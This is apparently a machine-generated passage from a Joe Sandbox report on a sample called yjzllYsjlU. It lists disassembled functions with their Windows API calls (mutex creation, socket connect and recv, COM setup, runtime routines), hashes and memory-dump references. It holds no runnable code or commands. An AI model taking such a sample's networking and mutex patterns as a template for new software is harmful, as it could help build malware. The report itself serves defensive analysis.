                    • String ID: api-ms-
                    • API String ID: 0-2084034818
                    • Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
                    • Instruction ID: e982735470ecda22ca74b33b30026038f59a5160edbe4d0761f7899da1883318
                    • Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
                    • Instruction Fuzzy Hash: 72110F35901726BBC736CB68DC45A1F37749F097A1F325523ED01A7391D638DD008AE8
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 004320B7
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
                    • StructuredWorkStealingQueue.LIBCMT ref: 004320FE
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 021B231E
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B232F
                    • StructuredWorkStealingQueue.LIBCMT ref: 021B2365
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B2376
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: c3404b7b94436087d4b0600e274b0e64b961e18d49a2e9e2f5ce0b885acb57ce
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: 2B1191311401059BDB1BDE68C850AEF77B9AF0A314B18C569EC169F221DB71D90DCFA0
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 0218ABCA
                    • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0218ABE8
                    • GetLastError.KERNEL32 ref: 0218ABF0
                    • GetLastError.KERNEL32 ref: 0218AC01
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CreateMutexSleep
                    • String ID: T2F
                    • API String ID: 3645482037-3862687658
                    • Opcode ID: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
                    • Instruction ID: 4b0107e7222c91d892e4fb394a5a0b61ac4a66f0801cd8f3fd161ba45cfd1ae5
                    • Opcode Fuzzy Hash: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
                    • Instruction Fuzzy Hash: F901D131680344EFE710AF68FC48B5A7765EB41B22F100A36E615831D0EB78A944CF59
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 00436582
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00436595
                    • FreeLibrary.KERNEL32(00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 004365B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction ID: dbc2b550f678300173dffafd29bb25114a02185772f501870b49608a3602ef38
                    • Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction Fuzzy Hash: C4F01235941319FBDB129B50ED0EB9E7A79EB04757F154072F805A22A1CB78CF04DB98
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,0041D136,00000064), ref: 0041D1BC
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D1C6
                    • WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0041D136,00000064,?,76230F00,?,004075ED,00468680), ref: 0041D1D7
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D1DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID: PWF
                    • API String ID: 3269011525-4189640852
                    • Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction ID: 46656ffccb6e8e596dcc74b2c483e7fba3308dd0c831886d2789c24014a254a2
                    • Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction Fuzzy Hash: 75E01235641B24F7CB021B50EC09B8E3F58EB05753F144032FA05661619B659D40DBDF
                    APIs
                    • GetCPInfo.KERNEL32(00521A18,00521A18,?,7FFFFFFF,?,?,00446A65,00521A18,00521A18,?,00521A18,?,?,?,?,00521A18), ref: 0044684C
                    • __alloca_probe_16.LIBCMT ref: 00446902
                    • __alloca_probe_16.LIBCMT ref: 00446998
                    • __freea.LIBCMT ref: 00446A03
                    • __freea.LIBCMT ref: 00446A0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID:
                    • API String ID: 2330168043-0
                    • Opcode ID: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
                    • Instruction ID: 261b0646ef3bb21783759df69fc444e01875a83395626589d87ed72ffed4e1ba
                    • Opcode Fuzzy Hash: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
                    • Instruction Fuzzy Hash: 4481C172D006459BEF20AF658881AEF7BB5DF0B354F1A405BE904B7341E739CC458BAA
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00444C98
                    • __alloca_probe_16.LIBCMT ref: 00444D5E
                    • __freea.LIBCMT ref: 00444DCA
                      • Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043B07D
                    • __freea.LIBCMT ref: 00444DD3
                    • __freea.LIBCMT ref: 00444DF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                    • Instruction ID: 3df8754f567642f5bc12b9c6ac1686bc91f11376b98a6e44c20c24ac8824f300
                    • Opcode Fuzzy Hash: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                    • Instruction Fuzzy Hash: 1651D5B2A00216ABFB255F55DC81FBB36A9DFC4754F15012BFD0497251EB38DC1186A8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
                    • Instruction ID: 9fe20825ab4e110aa9a0c60296a7db4166f1dda9c82ae5e362aa72f56640b031
                    • Opcode Fuzzy Hash: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
                    • Instruction Fuzzy Hash: CB618570D44718AFDB20EF64CD89B99B7B5FF04310F1042AAE80DA7251EB74AA41CF96
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 0040DF4D
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF86
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DFB4
                    • closesocket.WS2_32(?), ref: 0040E028
                    • __Mtx_unlock.LIBCPMT ref: 0040E05D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlockrecv$closesocket
                    • String ID:
                    • API String ID: 1157980791-0
                    • Opcode ID: b3ca68a6cb2e0dd676154645a2f8576170dabd98dca11c7a3b3798b3f7b83ddb
                    • Instruction ID: ff851d167357bcc52532b6b7cc28a367e5acf8f97903fc6b0511556a698fdea0
                    • Opcode Fuzzy Hash: b3ca68a6cb2e0dd676154645a2f8576170dabd98dca11c7a3b3798b3f7b83ddb
                    • Instruction Fuzzy Hash: DF51D371D04201EFD7209F51CC89A96B7B5FF04304F1481BFE80AA72A1EB75AD54CB59
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,021B714D), ref: 021B723D
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 021B7297
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,021B714D,?,000000FF,00000000,00000000), ref: 021B7325
                    • __dosmaperr.LIBCMT ref: 021B732C
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 021B7369
                      • Part of subcall function 021B7591: __dosmaperr.LIBCMT ref: 021B75C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction ID: f23d715dedfa11b3dd87fe92712e343a22063bfafc6df4d99a270ac8289bd27c
                    • Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction Fuzzy Hash: A8413A76980704AFDB259FA5EC449EFFBF9EF88300B00452DE856D32A0E7309941CB21
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0218BCBE
                    • CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 0218BCDA
                    • CoUninitialize.COMBASE ref: 0218BCE8
                    • CoUninitialize.COMBASE ref: 0218BDA7
                    • CoUninitialize.COMBASE ref: 0218BDBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Uninitialize$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1968832861-0
                    • Opcode ID: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
                    • Instruction ID: dd73b36e4548d7907d72a599073cc206d142b6dc205385fe557d554ee065d74c
                    • Opcode Fuzzy Hash: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
                    • Instruction Fuzzy Hash: BE419031A44109AFDB08DF68CC89BAE77B5EF48719F108258F915E7291DB75EA40CFA0
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64
                      • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DC09
                    • Concurrency::location::_Assign.LIBCMT ref: 0042DC56
                      • Part of subcall function 00431332: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431377
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
                    • Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021ADDCB
                      • Part of subcall function 021A9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021A91B7
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 021ADE2A
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 021ADE50
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 021ADE70
                    • Concurrency::location::_Assign.LIBCMT ref: 021ADEBD
                      • Part of subcall function 021B1599: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021B15DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction ID: a5f139e1793b802416312316548c807c1bc52676c2e657816dcaa9d469f9f409
                    • Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction Fuzzy Hash: C7410778680210AFCF19EB24D8A5BBDBB76AF45720F1440D9E5069B781CB30A945CBD1
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0219EF54
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0219EF7E
                      • Part of subcall function 0219F644: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0219F661
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0219EFFB
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0219F02D
                    • __freea.LIBCMT ref: 0219F053
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
                    • Instruction ID: eac5fc399bf4722658b0662f16c1523b75433be8c889703b0f40a3f7756e255b
                    • Opcode Fuzzy Hash: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
                    • Instruction Fuzzy Hash: 7B319E75A402059FCF19DFA8C840AAEB7B6EF09714F29406FE445E7340DB74AD02CB95
                    APIs
                    • _SpinWait.LIBCONCRT ref: 004286EE
                      • Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8
                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
                    • List.LIBCMT ref: 004287B7
                    • List.LIBCMT ref: 004287C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                    • String ID:
                    • API String ID: 3281396844-0
                    • Opcode ID: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
                    • Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
                    • Opcode Fuzzy Hash: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
                    • Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99
                    APIs
                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 0040DE2C
                    • FreeAddrInfoW.WS2_32(?), ref: 0040DE4D
                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040DE75
                    • connect.WS2_32(00000000,?,00000010), ref: 0040DE87
                    • closesocket.WS2_32(00000000), ref: 0040DEA1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
                    • String ID:
                    • API String ID: 242599585-0
                    • Opcode ID: d3982aedac2a5c94766331ef093bc1566eeb3870826ac122965e00373034951a
                    • Instruction ID: 23abe507401a6561ed447c90683016714f9a9af45c9242d02c2306d312d96357
                    • Opcode Fuzzy Hash: d3982aedac2a5c94766331ef093bc1566eeb3870826ac122965e00373034951a
                    • Instruction Fuzzy Hash: 9E218875E053149BDB249BA1DC89FEE7368DF18301F0000BBF909A62C1D7789D948B5A
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 021A7617
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 021A7659
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 021A7675
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 021A7680
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021A76A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction ID: 63504bdf3c6709ac7932deb389ab30c4125ef8b878552fee5e50c6983ca404f7
                    • Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction Fuzzy Hash: A2214F78A40208AFDF04EFADC5A4BADB7B5BF09354F5040A9D905A73A1DB30AE05CF94
                    APIs
                    • _free.LIBCMT ref: 0043F052
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 0043F064
                    • _free.LIBCMT ref: 0043F076
                    • _free.LIBCMT ref: 0043F088
                    • _free.LIBCMT ref: 0043F09A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction ID: afd9a687733b4b320e977570e7283cbf07406cc3be8dc42b58a2af08add3b970
                    • Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction Fuzzy Hash: 7AF06832904604FB8534EB5DE681C0773FBEA48312B54281BF048D7611CBB8FC84465D
                    APIs
                    • _free.LIBCMT ref: 021BF2B9
                      • Part of subcall function 021BB05C: HeapFree.KERNEL32(00000000,00000000,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?), ref: 021BB072
                      • Part of subcall function 021BB05C: GetLastError.KERNEL32(?,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?,?), ref: 021BB084
                    • _free.LIBCMT ref: 021BF2CB
                    • _free.LIBCMT ref: 021BF2DD
                    • _free.LIBCMT ref: 021BF2EF
                    • _free.LIBCMT ref: 021BF301
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction ID: 1f9ed260b497624b04dcf552f9a6324f986d40730f5381f28701cb2fbac48ca9
                    • Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
                    • Instruction Fuzzy Hash: 45F06232948600BB8632EB64EAD1CAB77FAFE007187640805F41CD7D60DBB0F980CB54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction ID: 8444feb9c58af159b24f360d524a1af6424cb6e40e41c758a4baa9ba100f3a22
                    • Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction Fuzzy Hash: 1E618DB1E002199FCB14DFA9D8815EEFBF5EF4C310F25916AE845E7300E639AE418B94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction ID: 6fcdc5a77f79f8b5d491faf59693dc45f1b0d69df821376da9d84b55ce2fc0d4
                    • Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
                    • Instruction Fuzzy Hash: 0D613CB5E402199FCB19DFA8D8805EDFBF5EF48310F2581AAD855E7340D771AE418B90
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
                    • _free.LIBCMT ref: 0044274A
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
